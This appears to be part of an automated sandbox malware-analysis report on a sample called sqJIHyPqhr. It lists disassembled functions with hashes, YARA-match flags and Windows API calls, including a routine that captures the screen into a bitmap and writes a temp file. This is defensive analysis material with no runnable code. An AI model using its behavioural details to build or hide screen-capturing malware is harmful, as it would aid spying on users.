                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                                      • String ID:
                                                                      • API String ID: 2016158738-0
                                                                      • Opcode ID: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                                      • Instruction ID: ec76e124c96d5fb6d75208995366108955e3ecd697e122142a5eb02f601840fd
                                                                      • Opcode Fuzzy Hash: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                                      • Instruction Fuzzy Hash: C8F0553A30020897CB089F7BE81976BBF90EFC5754F0A409EEF098B290C3399942C794
                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00410672,024AFE60), ref: 024B08D2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                      • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                                      • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                      • Instruction Fuzzy Hash:
                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                      • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                                      • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                      • Instruction Fuzzy Hash:
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: HeapProcess
                                                                      • String ID:
                                                                      • API String ID: 54951025-0
                                                                      • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                      • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                                      • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                      • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                      • Instruction ID: 2844b30024e45351147ede59872166b67bb7d3639a7d84f230d679a3a0c0a750
                                                                      • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                      • Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                                      • Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
                                                                      • Opcode Fuzzy Hash: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                                      • Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                                      • Instruction ID: f5dc45d908b2bfc607a62fccd2d7529f5df9a9a2915fbff514806d1b75aa630e
                                                                      • Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                                      • Instruction Fuzzy Hash: F0D1E93A1085A30BD7AE4A3D847003BFFF56A421A132D47AFD4F7CA6C2EE24D555DA60
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                      • Instruction ID: 2f7a8353aeb90aa2e6ec2132656e863588cab7c4eb3835bde98abb4697ebb6b6
                                                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                      • Instruction Fuzzy Hash: B691883A1090A34AE7AB463E847403FFFE15A422B572A079FD4F3CA2C5EF24C555DA20
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                      • Instruction ID: b25d7b7a8e55bbee32d2fc67e28ff16be1cfeba2f71328b5531bdb6c5bdb1bbb
                                                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                      • Instruction Fuzzy Hash: 6491647230D0B34ADB294679953443FFFE15E523A135A07DFE4F2CA2C1EE289964D624
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                      • Instruction ID: ba01b5596e1314e8bcca5289ee68cc037320f24e333720dd533c03d1f8659f52
                                                                      • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                      • Instruction Fuzzy Hash: 0591767A1080E34ADBAB467D853813FFFE15A421A532A07AFD4F2CA2D5FF24C555D620
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                      • Instruction ID: 19c93412fb5f9130a8e3bb0cb99d698500333008097130ff6794007c36a41420
                                                                      • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                      • Instruction Fuzzy Hash: 6591943230A0B34EEB294279943403FFFE15A523A135A07DFD4F2CA2C5EE189565E628
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                      • Instruction ID: 3ddaec53211faab93544a76803c46cb5bcee69ff1cbc619161e7ade9a0916668
                                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                      • Instruction Fuzzy Hash: C891427A2090A30BDBA9463D857413FFEE99A411A572A079FE4F3CB2C1EF24C554DE20
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                      • Instruction ID: d2c87871af4d92e544e05363471dd483cf2102058027b34f35735ca62f395a82
                                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                      • Instruction Fuzzy Hash: 0691937230D0B34ADB2D467AA47403EFFE15A523B139A079FD4F2CB2C1ED18D6659628
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                      • Instruction ID: 82ce25e423075e3c183663622c344e6a83120bbc9a5fd827f9e39d21bf72f057
                                                                      • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                      • Instruction Fuzzy Hash: 7761357DE04B04E6DAB86A2C8890BBF6395AF41A08F34143FE856DB3C4D7259982C775
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                                      • Instruction ID: 543360d7dfb9058b4a8e0476cf2bcab449255d23345d35b398e8df16a867321f
                                                                      • Opcode Fuzzy Hash: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                                      • Instruction Fuzzy Hash: 856154B1F0073876DA385A2CB892BBF63849F41748FE4041BE447DB381D69DDD82865E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                      • Instruction ID: 0010edea7b5c5155df289c795bf04f9025734430a3bee2392a7eb5ac990eb0ea
                                                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                      • Instruction Fuzzy Hash: 3081547A2080A34BEBA9467E847403FFFE55A411A532A079FD4F3CB2C5FF148265DA20
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                      • Instruction ID: 3d3f4059477c25f3e34474a921d34c240437fa272c48f742cc2d27251d9ebad1
                                                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                      • Instruction Fuzzy Hash: E481737230D0B34AEB294679943843FFFE15A523A135A079FD4F2CA2C1EE188A64D624
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                      • Instruction ID: 665b4b57edae77b2c7eb8ebc4ab95a35a49b29bf35be8fe958a681f6b7fb7d5e
                                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                      • Instruction Fuzzy Hash: CF11087F2090424796D7862ED8B42BBE395EAC522873D567FD0414BF58D332E145D620
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                      • Instruction ID: e183cc42c0575e46eff71331dfd644b760227977963c57612164f9205c38e507
                                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                      • Instruction Fuzzy Hash: 631138773030B1A3D604862DF8B46BFA395EBE63217EC426FC0424B748CE6AE9C1950C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4891593646.00000000009D9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009D9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9d9000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                      • Instruction ID: b95969067abf03d355d54777efd578a1da0751fcde7f9ae1011d11fae8ca95d6
                                                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                      • Instruction Fuzzy Hash: E4115E72380100AFD754EF55DC81FA673EAEB89360B298166FD05CB356E679EC41C760
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                      • Instruction ID: d2f4d3bb4b2cbe01b0d25eaf4a28ec74c27e07ab8f56957cf8c9ab6a2dcf7ba0
                                                                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                      • Instruction Fuzzy Hash: EB012673A106008FDF21CF20C914BAB33F5FB96206F0550BAD90AD7381E370A941CB80
                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
                                                                      • GetClientRect.USER32(?,?), ref: 0040214A
                                                                      • GetDC.USER32(?), ref: 00402151
                                                                      • CreateSolidBrush.GDI32(00646464), ref: 00402164
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00402178
                                                                      • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00402191
                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
                                                                      • MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004021EA
                                                                      • SetBkMode.GDI32(?,00000001), ref: 00402267
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00402276
                                                                      • _wcslen.LIBCMT ref: 0040227F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                                      • String ID: Tahoma
                                                                      • API String ID: 3832963559-3580928618
                                                                      • Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                                      • Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
                                                                      • Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                                      • Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14
                                                                      APIs
                                                                      • DestroyWindow.USER32(?), ref: 004025CD
                                                                      • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
                                                                      • ReleaseCapture.USER32 ref: 004025F2
                                                                      • GetDC.USER32(00000000), ref: 00402619
                                                                      • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
                                                                      • CreateCompatibleDC.GDI32(?), ref: 004026A9
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004026B3
                                                                      • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
                                                                      • ShowWindow.USER32(?,00000000), ref: 004026EA
                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
                                                                      • GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
                                                                      • DeleteFileW.KERNEL32(?), ref: 00402731
                                                                      • DeleteDC.GDI32(00000000), ref: 00402738
                                                                      • DeleteObject.GDI32(00000000), ref: 0040273F
                                                                      • ReleaseDC.USER32(00000000,?), ref: 0040274D
                                                                      • DestroyWindow.USER32(?), ref: 00402754
                                                                      • SetCapture.USER32(?), ref: 004027A1
                                                                      • GetDC.USER32(00000000), ref: 004027D5
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 004027EB
                                                                      • GetKeyState.USER32(0000001B), ref: 004027F8
                                                                      • DestroyWindow.USER32(?), ref: 0040280D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                                      • String ID: gya
                                                                      • API String ID: 2545303185-1989253062
                                                                      • Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                                      • Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
                                                                      • Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                                      • Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$Info
                                                                      • String ID:
                                                                      • API String ID: 2509303402-0
                                                                      • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                      • Instruction ID: ddf4bf2d678f15a6bd156ee1ccd30e6d49c52f82e84c94846958af7556e3a17c
                                                                      • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                      • Instruction Fuzzy Hash: FEB18B75A003099FDB61DF69C890BEEBBB5BF09304F24416EE495A7351D775A841CF20
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: _free$Info
                                                                      • String ID:
                                                                      • API String ID: 2509303402-0
                                                                      • Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                                      • Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
                                                                      • Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                                      • Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24
                                                                      APIs
                                                                      • ___free_lconv_mon.LIBCMT ref: 024DA8A3
                                                                        • Part of subcall function 024D9BF2: _free.LIBCMT ref: 024D9C0F
                                                                        • Part of subcall function 024D9BF2: _free.LIBCMT ref: 024D9C21
                                                                        • Part of subcall function 024D9BF2: _free.LIBCMT ref: 024D9C33
                                                                        • Part of subcall function 024D9BF2: _free.LIBCMT ref: 024D9C45
                                                                        • Part of subcall function 024D9BF2: _free.LIBCMT ref: 024D9C57
                                                                        • Part of subcall function 024D9BF2: _free.LIBCMT ref: 024D9C69
                                                                        • Part of subcall function 024D9BF2: _free.LIBCMT ref: 024D9C7B
                                                                        • Part of subcall function 024D9BF2: _free.LIBCMT ref: 024D9C8D
                                                                        • Part of subcall function 024D9BF2: _free.LIBCMT ref: 024D9C9F
                                                                        • Part of subcall function 024D9BF2: _free.LIBCMT ref: 024D9CB1
                                                                        • Part of subcall function 024D9BF2: _free.LIBCMT ref: 024D9CC3
                                                                        • Part of subcall function 024D9BF2: _free.LIBCMT ref: 024D9CD5
                                                                        • Part of subcall function 024D9BF2: _free.LIBCMT ref: 024D9CE7
                                                                      • _free.LIBCMT ref: 024DA898
                                                                        • Part of subcall function 024D36D1: HeapFree.KERNEL32(00000000,00000000,?,024DA35F,?,00000000,?,00000000,?,024DA603,?,00000007,?,?,024DA9F7,?), ref: 024D36E7
                                                                        • Part of subcall function 024D36D1: GetLastError.KERNEL32(?,?,024DA35F,?,00000000,?,00000000,?,024DA603,?,00000007,?,?,024DA9F7,?,?), ref: 024D36F9
                                                                      • _free.LIBCMT ref: 024DA8BA
                                                                      • _free.LIBCMT ref: 024DA8CF
                                                                      • _free.LIBCMT ref: 024DA8DA
                                                                      • _free.LIBCMT ref: 024DA8FC
                                                                      • _free.LIBCMT ref: 024DA90F
                                                                      • _free.LIBCMT ref: 024DA91D
                                                                      • _free.LIBCMT ref: 024DA928
                                                                      • _free.LIBCMT ref: 024DA960
                                                                      • _free.LIBCMT ref: 024DA967
                                                                      • _free.LIBCMT ref: 024DA984
                                                                      • _free.LIBCMT ref: 024DA99C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                      • String ID:
                                                                      • API String ID: 161543041-0
                                                                      • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                      • Instruction ID: bd3c5142786ff91dba411683c7713dc630be6f595f797aa3f177ad7c9774fe49
                                                                      • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                      • Instruction Fuzzy Hash: 7E315C316002119FEB30AF3AE854B5BB7E9AF00754F1548AFE849D7790DB71A850CE65
                                                                      APIs
                                                                      • ___free_lconv_mon.LIBCMT ref: 0043A63C
                                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
                                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
                                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
                                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
                                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
                                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
                                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
                                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
                                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
                                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
                                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
                                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
                                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80
                                                                      • _free.LIBCMT ref: 0043A631
                                                                        • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                        • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                      • _free.LIBCMT ref: 0043A653
                                                                      • _free.LIBCMT ref: 0043A668
                                                                      • _free.LIBCMT ref: 0043A673
                                                                      • _free.LIBCMT ref: 0043A695
                                                                      • _free.LIBCMT ref: 0043A6A8
                                                                      • _free.LIBCMT ref: 0043A6B6
                                                                      • _free.LIBCMT ref: 0043A6C1
                                                                      • _free.LIBCMT ref: 0043A6F9
                                                                      • _free.LIBCMT ref: 0043A700
                                                                      • _free.LIBCMT ref: 0043A71D
